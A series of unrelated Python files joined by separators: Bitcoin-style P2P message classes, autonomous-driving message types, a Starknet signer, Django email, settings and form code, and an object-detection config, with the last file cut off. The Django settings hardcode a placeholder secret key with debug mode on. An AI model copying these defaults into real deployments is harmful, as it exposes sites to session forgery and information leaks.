return "CBlockHeader(nVersion=%i hashPrevBlock=%064x hashMerkleRoot=%064x nTime=%s nBits=%08x nNonce=%08x)" \
% (self.nVersion, self.hashPrevBlock, self.hashMerkleRoot,
time.ctime(self.nTime), self.nBits, self.nNonce)
class CBlock(CBlockHeader):
def __init__(self, header=None):
super(CBlock, self).__init__(header)
self.vtx = []
def deserialize(self, f):
super(CBlock, self).deserialize(f)
self.vtx = deser_vector(f, CTransaction)
def serialize(self, with_witness=False):
r = b""
r += super(CBlock, self).serialize()
if with_witness:
r += ser_vector(self.vtx, "serialize_with_witness")
else:
r += ser_vector(self.vtx, "serialize_without_witness")
if hasattr(self, 'vchBlockSig'):
r += ser_string(self.vchBlockSig)
return r
# Calculate the merkle root given a vector of transaction hashes
@classmethod
def get_merkle_root(cls, hashes):
while len(hashes) > 1:
newhashes = []
for i in range(0, len(hashes), 2):
i2 = min(i+1, len(hashes)-1)
newhashes.append(hash256(hashes[i] + hashes[i2]))
hashes = newhashes
return uint256_from_str(hashes[0])
def calc_merkle_root(self):
hashes = []
for tx in self.vtx:
tx.calc_sha256()
hashes.append(ser_uint256(tx.sha256))
return self.get_merkle_root(hashes)
def calc_witness_merkle_root(self):
# For witness root purposes, the hash of the
# coinbase, with witness, is defined to be 0...0
hashes = [ser_uint256(0)]
for tx in self.vtx[1:]:
# Calculate the hashes with witness data
hashes.append(ser_uint256(tx.calc_sha256(True)))
return self.get_merkle_root(hashes)
def is_valid(self):
self.calc_sha256()
target = uint256_from_compact(self.nBits)
if self.sha256 > target:
return False
for tx in self.vtx:
if not tx.is_valid():
return False
if self.calc_merkle_root() != self.hashMerkleRoot:
return False
return True
def solve(self):
self.rehash()
target = uint256_from_compact(self.nBits)
while self.sha256 > target:
self.nNonce += 1
self.rehash()
def sign_block(self, key, low_s=True):
data = b""
data += struct.pack("<i", self.nVersion)
data += ser_uint256(self.hashPrevBlock)
data += ser_uint256(self.hashMerkleRoot)
data += struct.pack("<I", self.nTime)
data += struct.pack("<I", self.nBits)
data += struct.pack("<I", self.nNonce)
data += ser_uint256(self.nAccumulatorCheckpoint)
sha256NoSig = hash256(data)
self.vchBlockSig = key.sign(sha256NoSig, low_s=low_s)
def __repr__(self):
return "CBlock(nVersion=%i hashPrevBlock=%064x hashMerkleRoot=%064x nTime=%s nBits=%08x nNonce=%08x vtx=%s)" \
% (self.nVersion, self.hashPrevBlock, self.hashMerkleRoot,
time.ctime(self.nTime), self.nBits, self.nNonce, repr(self.vtx))
class PrefilledTransaction():
def __init__(self, index=0, tx = None):
self.index = index
self.tx = tx
def deserialize(self, f):
self.index = deser_compact_size(f)
self.tx = CTransaction()
self.tx.deserialize(f)
def serialize(self, with_witness=True):
r = b""
r += ser_compact_size(self.index)
if with_witness:
r += self.tx.serialize_with_witness()
else:
r += self.tx.serialize_without_witness()
return r
def serialize_without_witness(self):
return self.serialize(with_witness=False)
def serialize_with_witness(self):
return self.serialize(with_witness=True)
def __repr__(self):
return "PrefilledTransaction(index=%d, tx=%s)" % (self.index, repr(self.tx))
# This is what we send on the wire, in a cmpctblock message.
class P2PHeaderAndShortIDs():
def __init__(self):
self.header = CBlockHeader()
self.nonce = 0
self.shortids_length = 0
self.shortids = []
self.prefilled_txn_length = 0
self.prefilled_txn = []
def deserialize(self, f):
self.header.deserialize(f)
self.nonce = struct.unpack("<Q", f.read(8))[0]
self.shortids_length = deser_compact_size(f)
for i in range(self.shortids_length):
# shortids are defined to be 6 bytes in the spec, so append
# two zero bytes and read it in as an 8-byte number
self.shortids.append(struct.unpack("<Q", f.read(6) + b'\x00\x00')[0])
self.prefilled_txn = deser_vector(f, PrefilledTransaction)
self.prefilled_txn_length = len(self.prefilled_txn)
# When using version 2 compact blocks, we must serialize with_witness.
def serialize(self, with_witness=False):
r = b""
r += self.header.serialize()
r += struct.pack("<Q", self.nonce)
r += ser_compact_size(self.shortids_length)
for x in self.shortids:
# We only want the first 6 bytes
r += struct.pack("<Q", x)[0:6]
if with_witness:
r += ser_vector(self.prefilled_txn, "serialize_with_witness")
else:
r += ser_vector(self.prefilled_txn, "serialize_without_witness")
return r
def __repr__(self):
return "P2PHeaderAndShortIDs(header=%s, nonce=%d, shortids_length=%d, shortids=%s, prefilled_txn_length=%d, prefilledtxn=%s" % (repr(self.header), self.nonce, self.shortids_length, repr(self.shortids), self.prefilled_txn_length, repr(self.prefilled_txn))
# P2P version of the above that will use witness serialization (for compact
# block version 2)
class P2PHeaderAndShortWitnessIDs(P2PHeaderAndShortIDs):
def serialize(self):
return super(P2PHeaderAndShortWitnessIDs, self).serialize(with_witness=True)
# Calculate the BIP 152-compact blocks shortid for a given transaction hash
def calculate_shortid(k0, k1, tx_hash):
expected_shortid = siphash256(k0, k1, tx_hash)
expected_shortid &= 0x0000ffffffffffff
return expected_shortid
# This version gets rid of the array lengths, and reinterprets the differential
# encoding into indices that can be used for lookup.
class HeaderAndShortIDs():
def __init__(self, p2pheaders_and_shortids = None):
self.header = CBlockHeader()
self.nonce = 0
self.shortids = []
self.prefilled_txn = []
self.use_witness = False
if p2pheaders_and_shortids != None:
self.header = p2pheaders_and_shortids.header
self.nonce = p2pheaders_and_shortids.nonce
self.shortids = p2pheaders_and_shortids.shortids
last_index = -1
for x in p2pheaders_and_shortids.prefilled_txn:
self.prefilled_txn.append(PrefilledTransaction(x.index + last_index + 1, x.tx))
last_index = self.prefilled_txn[-1].index
def to_p2p(self):
if self.use_witness:
ret = P2PHeaderAndShortWitnessIDs()
else:
ret = P2PHeaderAndShortIDs()
ret.header = self.header
ret.nonce = self.nonce
ret.shortids_length = len(self.shortids)
ret.shortids = self.shortids
ret.prefilled_txn_length = len(self.prefilled_txn)
ret.prefilled_txn = []
last_index = -1
for x in self.prefilled_txn:
ret.prefilled_txn.append(PrefilledTransaction(x.index - last_index - 1, x.tx))
last_index = x.index
return ret
def get_siphash_keys(self):
header_nonce = self.header.serialize()
header_nonce += struct.pack("<Q", self.nonce)
hash_header_nonce_as_str = sha256(header_nonce)
key0 = struct.unpack("<Q", hash_header_nonce_as_str[0:8])[0]
key1 = struct.unpack("<Q", hash_header_nonce_as_str[8:16])[0]
return [ key0, key1 ]
# Version 2 compact blocks use wtxid in shortids (rather than txid)
def initialize_from_block(self, block, nonce=0, prefill_list = [0], use_witness = False):
self.header = CBlockHeader(block)
self.nonce = nonce
self.prefilled_txn = [ PrefilledTransaction(i, block.vtx[i]) for i in prefill_list ]
self.shortids = []
self.use_witness = use_witness
[k0, k1] = self.get_siphash_keys()
for i in range(len(block.vtx)):
if i not in prefill_list:
tx_hash = block.vtx[i].sha256
if use_witness:
tx_hash = block.vtx[i].calc_sha256(with_witness=True)
self.shortids.append(calculate_shortid(k0, k1, tx_hash))
def __repr__(self):
return "HeaderAndShortIDs(header=%s, nonce=%d, shortids=%s, prefilledtxn=%s" % (repr(self.header), self.nonce, repr(self.shortids), repr(self.prefilled_txn))
class BlockTransactionsRequest():
def __init__(self, blockhash=0, indexes = None):
self.blockhash = blockhash
self.indexes = indexes if indexes != None else []
def deserialize(self, f):
self.blockhash = deser_uint256(f)
indexes_length = deser_compact_size(f)
for i in range(indexes_length):
self.indexes.append(deser_compact_size(f))
def serialize(self):
r = b""
r += ser_uint256(self.blockhash)
r += ser_compact_size(len(self.indexes))
for x in self.indexes:
r += ser_compact_size(x)
return r
# helper to set the differentially encoded indexes from absolute ones
def from_absolute(self, absolute_indexes):
self.indexes = []
last_index = -1
for x in absolute_indexes:
self.indexes.append(x-last_index-1)
last_index = x
def to_absolute(self):
absolute_indexes = []
last_index = -1
for x in self.indexes:
absolute_indexes.append(x+last_index+1)
last_index = absolute_indexes[-1]
return absolute_indexes
def __repr__(self):
return "BlockTransactionsRequest(hash=%064x indexes=%s)" % (self.blockhash, repr(self.indexes))
class BlockTransactions():
def __init__(self, blockhash=0, transactions = None):
self.blockhash = blockhash
self.transactions = transactions if transactions != None else []
def deserialize(self, f):
self.blockhash = deser_uint256(f)
self.transactions = deser_vector(f, CTransaction)
def serialize(self, with_witness=True):
r = b""
r += ser_uint256(self.blockhash)
if with_witness:
r += ser_vector(self.transactions, "serialize_with_witness")
else:
r += ser_vector(self.transactions, "serialize_without_witness")
return r
def __repr__(self):
return "BlockTransactions(hash=%064x transactions=%s)" % (self.blockhash, repr(self.transactions))
class CPartialMerkleTree():
def __init__(self):
self.nTransactions = 0
self.vHash = []
self.vBits = []
self.fBad = False
def deserialize(self, f):
self.nTransactions = struct.unpack("<i", f.read(4))[0]
self.vHash = deser_uint256_vector(f)
vBytes = deser_string(f)
self.vBits = []
for i in range(len(vBytes) * 8):
self.vBits.append(vBytes[i//8] & (1 << (i % 8)) != 0)
def serialize(self):
r = b""
r += struct.pack("<i", self.nTransactions)
r += ser_uint256_vector(self.vHash)
vBytesArray = bytearray([0x00] * ((len(self.vBits) + 7)//8))
for i in range(len(self.vBits)):
vBytesArray[i // 8] |= self.vBits[i] << (i % 8)
r += ser_string(bytes(vBytesArray))
return r
def __repr__(self):
return "CPartialMerkleTree(nTransactions=%d, vHash=%s, vBits=%s)" % (self.nTransactions, repr(self.vHash), repr(self.vBits))
class CMerkleBlock():
def __init__(self):
self.header = CBlockHeader()
self.txn = CPartialMerkleTree()
def deserialize(self, f):
self.header.deserialize(f)
self.txn.deserialize(f)
def serialize(self):
r = b""
r += self.header.serialize()
r += self.txn.serialize()
return r
def __repr__(self):
return "CMerkleBlock(header=%s, txn=%s)" % (repr(self.header), repr(self.txn))
# Objects that correspond to messages on the wire
class msg_version():
command = b"version"
def __init__(self):
self.nVersion = MY_VERSION
self.nServices = NODE_NETWORK
self.nTime = int(time.time())
self.addrTo = CAddress()
self.addrFrom = CAddress()
self.nNonce = random.getrandbits(64)
self.strSubVer = MY_SUBVERSION
self.nStartingHeight = -1
self.nRelay = MY_RELAY
def deserialize(self, f):
self.nVersion = struct.unpack("<i", f.read(4))[0]
if self.nVersion == 10300:
self.nVersion = 300
self.nServices = struct.unpack("<Q", f.read(8))[0]
self.nTime = struct.unpack("<q", f.read(8))[0]
self.addrTo = CAddress()
self.addrTo.deserialize(f)
if self.nVersion >= 106:
self.addrFrom = CAddress()
self.addrFrom.deserialize(f)
self.nNonce = struct.unpack("<Q", f.read(8))[0]
self.strSubVer = deser_string(f)
else:
self.addrFrom = None
self.nNonce = None
self.strSubVer = None
self.nStartingHeight = None
if self.nVersion >= 209:
self.nStartingHeight = struct.unpack("<i", f.read(4))[0]
else:
self.nStartingHeight = None
if self.nVersion >= 70001:
# Relay field is optional for version 70001 onwards
try:
self.nRelay = struct.unpack("<b", f.read(1))[0]
except:
self.nRelay = 0
else:
self.nRelay = 0
def serialize(self):
r = b""
r += struct.pack("<i", self.nVersion)
r += struct.pack("<Q", self.nServices)
r += struct.pack("<q", self.nTime)
r += self.addrTo.serialize()
r += self.addrFrom.serialize()
r += struct.pack("<Q", self.nNonce)
r += ser_string(self.strSubVer)
r += struct.pack("<i", self.nStartingHeight)
r += struct.pack("<b", self.nRelay)
return r
def __repr__(self):
return 'msg_version(nVersion=%i nServices=%i nTime=%s addrTo=%s addrFrom=%s nNonce=0x%016X strSubVer=%s nStartingHeight=%i nRelay=%i)' \
% (self.nVersion, self.nServices, time.ctime(self.nTime),
repr(self.addrTo), repr(self.addrFrom), self.nNonce,
self.strSubVer, self.nStartingHeight, self.nRelay)
class msg_verack():
command = b"verack"
def __init__(self):
pass
def deserialize(self, f):
pass
def serialize(self):
return b""
def __repr__(self):
return "msg_verack()"
class msg_addr():
command = b"addr"
def __init__(self):
self.addrs = []
def deserialize(self, f):
self.addrs = deser_vector(f, CAddress)
def serialize(self):
return ser_vector(self.addrs)
def __repr__(self):
return "msg_addr(addrs=%s)" % (repr(self.addrs))
class msg_inv():
command = b"inv"
def __init__(self, inv=None):
if inv is None:
self.inv = []
else:
self.inv = inv
def deserialize(self, f):
self.inv = deser_vector(f, CInv)
def serialize(self):
return ser_vector(self.inv)
def __repr__(self):
return "msg_inv(inv=%s)" % (repr(self.inv))
class msg_getdata():
command = b"getdata"
def __init__(self, inv=None):
self.inv = inv if inv != None else []
def deserialize(self, f):
self.inv = deser_vector(f, CInv)
def serialize(self):
return ser_vector(self.inv)
def __repr__(self):
return "msg_getdata(inv=%s)" % (repr(self.inv))
class msg_getblocks():
command = b"getblocks"
def __init__(self):
self.locator = CBlockLocator()
self.hashstop = 0
def deserialize(self, f):
self.locator = CBlockLocator()
self.locator.deserialize(f)
self.hashstop = deser_uint256(f)
def serialize(self):
r = b""
r += self.locator.serialize()
r += ser_uint256(self.hashstop)
return r
def __repr__(self):
return "msg_getblocks(locator=%s hashstop=%064x)" \
% (repr(self.locator), self.hashstop)
class msg_tx():
command = b"tx"
def __init__(self, tx=CTransaction()):
self.tx = tx
def deserialize(self, f):
self.tx.deserialize(f)
def serialize(self):
return self.tx.serialize_without_witness()
def __repr__(self):
return "msg_tx(tx=%s)" % (repr(self.tx))
class msg_witness_tx(msg_tx):
def serialize(self):
return self.tx.serialize_with_witness()
class msg_block():
command = b"block"
def __init__(self, block=None):
if block is None:
self.block = CBlock()
else:
self.block = block
def deserialize(self, f):
self.block.deserialize(f)
def serialize(self):
return self.block.serialize(with_witness=False)
def __repr__(self):
return "msg_block(block=%s)" % (repr(self.block))
# for cases where a user needs tighter control over what is sent over the wire
# note that the user must supply the name of the command, and the data
class msg_generic():
def __init__(self, command, data=None):
self.command = command
self.data = data
def serialize(self):
return self.data
def __repr__(self):
return "msg_generic()"
class msg_witness_block(msg_block):
def serialize(self):
r = self.block.serialize(with_witness=True)
return r
class msg_getaddr():
command = b"getaddr"
def __init__(self):
pass
def deserialize(self, f):
pass
def serialize(self):
return b""
def __repr__(self):
return "msg_getaddr()"
class msg_ping():
command = b"ping"
def __init__(self, nonce=0):
self.nonce = nonce
def deserialize(self, f):
self.nonce = struct.unpack("<Q", f.read(8))[0]
def serialize(self):
r = b""
r += struct.pack("<Q", self.nonce)
return r
def __repr__(self):
return "msg_ping(nonce=%08x)" % self.nonce
class msg_pong():
command = b"pong"
def __init__(self, nonce=0):
self.nonce = nonce
def deserialize(self, f):
self.nonce = struct.unpack("<Q", f.read(8))[0]
def serialize(self):
r = b""
r += struct.pack("<Q", self.nonce)
return r
def __repr__(self):
return "msg_pong(nonce=%08x)" % self.nonce
class msg_mempool():
command = b"mempool"
def __init__(self):
pass
def deserialize(self, f):
pass
def serialize(self):
return b""
def __repr__(self):
return "msg_mempool()"
class msg_sendheaders():
command = b"sendheaders"
def __init__(self):
pass
def deserialize(self, f):
pass
def serialize(self):
return b""
def __repr__(self):
return "msg_sendheaders()"
# getheaders message has
# number of entries
# vector of hashes
# hash_stop (hash of last desired block header, 0 to get as many as possible)
class msg_getheaders():
command = b"getheaders"
def __init__(self):
self.locator = CBlockLocator()
self.hashstop = 0
def deserialize(self, f):
self.locator = CBlockLocator()
self.locator.deserialize(f)
self.hashstop = deser_uint256(f)
def serialize(self):
r = b""
r += self.locator.serialize()
r += ser_uint256(self.hashstop)
return r
def __repr__(self):
return "msg_getheaders(locator=%s, stop=%064x)" \
% (repr(self.locator), self.hashstop)
# headers message has
# <count> <vector of block headers>
class msg_headers():
command = b"headers"
def __init__(self, headers=None):
self.headers = headers if headers is not None else []
def deserialize(self, f):
# comment in bitcoind indicates these should be deserialized as blocks
blocks = deser_vector(f, CBlock)
for x in blocks:
self.headers.append(CBlockHeader(x))
def serialize(self):
blocks = [CBlock(x) for x in self.headers]
return ser_vector(blocks)
def __repr__(self):
return "msg_headers(headers=%s)" % repr(self.headers)
class msg_reject():
command = b"reject"
REJECT_MALFORMED = 1
def __init__(self):
self.message = b""
self.code = 0
self.reason = b""
self.data = 0
def deserialize(self, f):
self.message = deser_string(f)
self.code = struct.unpack("<B", f.read(1))[0]
self.reason = deser_string(f)
if (self.code != self.REJECT_MALFORMED and
(self.message == b"block" or self.message == b"tx")):
self.data = deser_uint256(f)
def serialize(self):
r = ser_string(self.message)
r += struct.pack("<B", self.code)
r += ser_string(self.reason)
if (self.code != self.REJECT_MALFORMED and
(self.message == b"block" or self.message == b"tx")):
r += ser_uint256(self.data)
return r
def __repr__(self):
return "msg_reject: %s %d %s [%064x]" \
% (self.message, self.code, self.reason, self.data)
class msg_feefilter():
command = b"feefilter"
def __init__(self, feerate=0):
self.feerate = feerate
def deserialize(self, f):
self.feerate = struct.unpack("<Q", f.read(8))[0]
def serialize(self):
r = b""
r += struct.pack("<Q", self.feerate)
return r
def __repr__(self):
return "msg_feefilter(feerate=%08x)" % self.feerate
class msg_sendcmpct():
command = b"sendcmpct"
def __init__(self):
self.announce = False
self.version = 1
def deserialize(self, f):
self.announce = struct.unpack("<?", f.read(1))[0]
self.version = struct.unpack("<Q", f.read(8))[0]
def serialize(self):
r = b""
r += struct.pack("<?", self.announce)
r += struct.pack("<Q", self.version)
return r
def __repr__(self):
return "msg_sendcmpct(announce=%s, version=%lu)" % (self.announce, self.version)
class msg_cmpctblock():
command = b"cmpctblock"
def __init__(self, header_and_shortids = None):
self.header_and_shortids = header_and_shortids
def deserialize(self, f):
self.header_and_shortids = P2PHeaderAndShortIDs()
self.header_and_shortids.deserialize(f)
def serialize(self):
r = b""
r += self.header_and_shortids.serialize()
return r
def __repr__(self):
return "msg_cmpctblock(HeaderAndShortIDs=%s)" % repr(self.header_and_shortids)
class msg_getblocktxn():
command = b"getblocktxn"
def __init__(self):
self.block_txn_request = None
def deserialize(self, f):
self.block_txn_request = BlockTransactionsRequest()
self.block_txn_request.deserialize(f)
def serialize(self):
r = b""
r += self.block_txn_request.serialize()
return r
def __repr__(self):
return "msg_getblocktxn(block_txn_request=%s)" % (repr(self.block_txn_request))
class msg_blocktxn():
command = b"blocktxn"
def __init__(self):
self.block_transactions = BlockTransactions()
def deserialize(self, f):
self.block_transactions.deserialize(f)
def serialize(self):
r = b""
r += self.block_transactions.serialize(with_witness=False)
return r
def __repr__(self):
return "msg_blocktxn(block_transactions=%s)" % (repr(self.block_transactions))
class msg_witness_blocktxn(msg_blocktxn):
def serialize(self):
r = b""
r += self.block_transactions.serialize(with_witness=True)
return r
|
from erdos.message import Message
class WaypointsMessage(Message):
""" This class represents a message to be used to send waypoints."""
def __init__(self, timestamp, waypoints=None, target_speed=0, wp_angle=0,
wp_vector=0, wp_angle_speed=0, wp_vector_speed=0,
stream_name='default'):
super(WaypointsMessage, self).__init__(None, timestamp, stream_name)
# Values used in Carla 0.8.4.
self.wp_angle = wp_angle
self.wp_vector = wp_vector
self.wp_angle_speed = wp_angle_speed
self.wp_vector_speed = wp_vector_speed
# Value used in Carla 0.9.x
self.target_speed = target_speed
self.waypoints = waypoints
def __str__(self):
return 'WaypointMessage(timestamp: {}, wp_angle: {}, wp_vector: {}, '\
'wp_angle_speed: {}, wp_vector_speed: {}, waypoints: {}'.format(
self.timestamp, self.wp_angle, self.wp_vector,
self.wp_angle_speed, self.wp_vector_speed, self.waypoints)
class BehaviorMessage(Message):
def __init__(self, timestamp,
target_lane_id,
target_speed,
target_deadline,
target_leading_vehicle_id=None):
super(BehaviorMessage, self).__init__(None, timestamp, 'default')
self.target_lane_id = target_lane_id
self.target_speed = target_speed
self.target_deadline = target_deadline
self.target_leading_vehicle_id = target_leading_vehicle_id
def __str__(self):
return 'BehaviorMessage(timestamp: {}, target_lane_id: {}, '\
'target_speed: {}, target_deadline: {}, '\
'target_leading_vehicle_id: {})'.format(
self.timestamp, self.target_lane_id, self.target_speed,
self.target_deadline, self.target_leading_vehicle_id)
|
"""Utility for sending signed transactions to an Account on Starknet."""
# Source: https://github.com/perama-v/GoL2/blob/main/tests/utils/Signer.py
# Commit Hash: a5c05c15be1569730da04fc4f1f2e89be38c69be
# License: MIT
from starkware.crypto.signature.signature import private_to_stark_key, sign
from starkware.starknet.public.abi import get_selector_from_name
from starkware.cairo.common.hash_state import compute_hash_on_elements
class Signer():
"""
Utility for sending signed transactions to an Account on Starknet.
Parameters
----------
private_key : int
Examples
---------
Constructing a Singer object
>>> signer = Signer(1234)
Sending a transaction
>>> await signer.send_transaction(account,
account.contract_address,
'set_public_key',
[other.public_key]
)
"""
def __init__(self, private_key):
self.private_key = private_key
self.public_key = private_to_stark_key(private_key)
def sign(self, message_hash):
return sign(msg_hash=message_hash, priv_key=self.private_key)
async def send_transaction(self, account, to, selector_name, calldata, nonce=None):
if nonce is None:
execution_info = await account.get_nonce().call()
nonce, = execution_info.result
selector = get_selector_from_name(selector_name)
message_hash = hash_message(
account.contract_address, to, selector, calldata, nonce)
sig_r, sig_s = self.sign(message_hash)
return await account.execute(to, selector, calldata, nonce).invoke(signature=[sig_r, sig_s])
def hash_message(sender, to, selector, calldata, nonce):
message = [
sender,
to,
selector,
compute_hash_on_elements(calldata),
nonce
]
return compute_hash_on_elements(message)
|
from __future__ import unicode_literals
from django.conf import settings
from django.contrib.auth.tokens import default_token_generator
from django.utils import translation
from emailing.emails import HtmlEmail
def send_confirmation_mail(user, template, extra_context, subject):
translation.activate(settings.LANGUAGE_CODE)
if not extra_context:
extra_context = dict()
conf = user.appconfig
bcc = settings.ADDITIONALLY_SEND_TO
subject = subject or conf.CONFIRM_EMAIL_SUBJECT
if settings.IGNORE_USER_EMAIL:
recipients = bcc
bcc = None
else:
recipients = [user.email]
token = default_token_generator.make_token(user)
context = {
'user': user,
'password_reset_confirm_url': user.get_confirm_link(user.urlnames.password_reset_confirm_urlname, token),
'account_confirm_url': user.get_confirm_link(user.urlnames.account_confirm_urlname, token),
'login_url': user._get_domain() + settings.LOGIN_URL
}
context.update(extra_context)
email = HtmlEmail(
from_email=conf.FROM_EMAIL,
to=recipients,
bcc=bcc,
subject=subject,
template=template,
context=context
)
email.send()
|
# model settings
model = dict(
type='FasterRCNN',
pretrained='torchvision://resnet50',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
norm_cfg=dict(type='BN', requires_grad=True),
style='pytorch'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
num_outs=5),
rpn_head=dict(
type='RPNHead',
in_channels=256,
feat_channels=256,
anchor_scales=[8],
anchor_ratios=[0.5, 1.0, 2.0],
anchor_strides=[4, 8, 16, 32, 64],
target_means=[.0, .0, .0, .0],
target_stds=[1.0, 1.0, 1.0, 1.0],
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),
bbox_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
bbox_head=dict(
type='SharedFCBBoxHead',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=81,
target_means=[0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2],
reg_class_agnostic=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)))
# model training and testing settings
train_cfg = dict(
rpn=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=-1,
add_gt_as_proposals=False),
allowed_border=0,
pos_weight=-1,
debug=False),
rpn_proposal=dict(
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False))
test_cfg = dict(
rpn=dict(
nms_across_levels=False,
nms_pre=1000,
nms_post=1000,
max_num=1000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
score_thr=0.05, nms=dict(type='nms', iou_thr=0.5), max_per_img=100)
# soft-nms is also supported for rcnn testing
# e.g., nms=dict(type='soft_nms', iou_thr=0.5, min_score=0.05)
)
# dataset settings
dataset_type = 'CocoDataset'
data_root = 'data/coco/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(type='Resize', img_scale=(1333, 800), keep_ratio=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1333, 800),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
imgs_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_train2017.json',
img_prefix=data_root + 'train2017/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline))
evaluation = dict(interval=1, metric='bbox')
# optimizer
optimizer = dict(type='SGD', lr=0.02, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[8, 11])
checkpoint_config = dict(interval=1)
# yapf:disable
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
# dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
total_epochs = 12
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/faster_rcnn_r50_fpn_1x'
load_from = None
resume_from = None
workflow = [('train', 1)]
|
from pathlib import Path
BASE_DIR = Path(__file__).resolve().parent.parent
SECRET_KEY = "very-secret-key"
DEBUG = True
ALLOWED_HOSTS = []
INSTALLED_APPS = [
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"app",
]
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
]
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator",
},
{
"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator",
"OPTIONS": {
"min_length": 9,
},
},
{
"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator",
},
{
"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator",
},
]
ROOT_URLCONF = "app.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
],
},
},
]
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": BASE_DIR / "db.sqlite3",
}
}
DEFAULT_AUTO_FIELD = "django.db.models.AutoField"
|
from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from .models import Post, Profile, Comments
from pyuploadcare.dj.forms import FileWidget
from pyuploadcare.dj.models import ImageField
class SignupForm(UserCreationForm):
email = forms.EmailField(max_length=200, help_text = 'Required')
class Meta:
model = User
fields = ('username', 'email', 'password1', 'password2')
class PostForm(forms.ModelForm):
class Meta:
model = Post
exclude = ['likes', 'post_date', 'profile']
class ProfileForm(forms.ModelForm):
class Meta:
model = Profile
exclude = ['user']
class CommentForm(forms.ModelForm):
class Meta:
model = Comments
exclude = ['post', 'user']
|
from .base import *
try:
from .local import *
except:
pass
try:
from .production import *
except:
pass
try:
from .imac import *
except:
pass
try:
from .macbookpro import *
except:
pass
|
import os
import six
import requests
import icalendar
from django.views.generic.base import View, ContextMixin
from django.http import HttpResponse, Http404
from django.core.exceptions import ImproperlyConfigured
from pytz import timezone
from dateutil.parser import parse
# PDFreactor's python wrapper doesn't support python 3, so neither can we for
# now.
if six.PY2:
from core.lib.PDFreactor import *
class PDFGeneratorView(View):
render_url = None
stylesheet_url = None
filename = None
license = os.environ.get('PDFREACTOR_LICENSE')
def get_render_url(self):
if self.render_url is None:
raise ImproperlyConfigured(
"PDFGeneratorView requires either a definition of "
"'render_url' or an implementation of 'get_render_url()'")
return self.render_url
def get_stylesheet_url(self):
if self.stylesheet_url is None:
raise ImproperlyConfigured(
"PDFGeneratorView requires either a definition of "
"'stylesheet_url' or an implementation of 'get_stylesheet_url()'")
return self.stylesheet_url
def get_filename(self):
if self.filename is None:
raise ImproperlyConfigured(
"PDFGeneratorView requires either a definition of "
"'filename' or an implementation of 'get_filename()'")
return self.filename
def generate_pdf(self):
if self.license is None:
raise Exception("PDFGeneratorView requires a license")
pdf_reactor = PDFreactor()
pdf_reactor.setLogLevel(PDFreactor.LOG_LEVEL_WARN)
pdf_reactor.setLicenseKey(self.license)
pdf_reactor.setAuthor('CFPB')
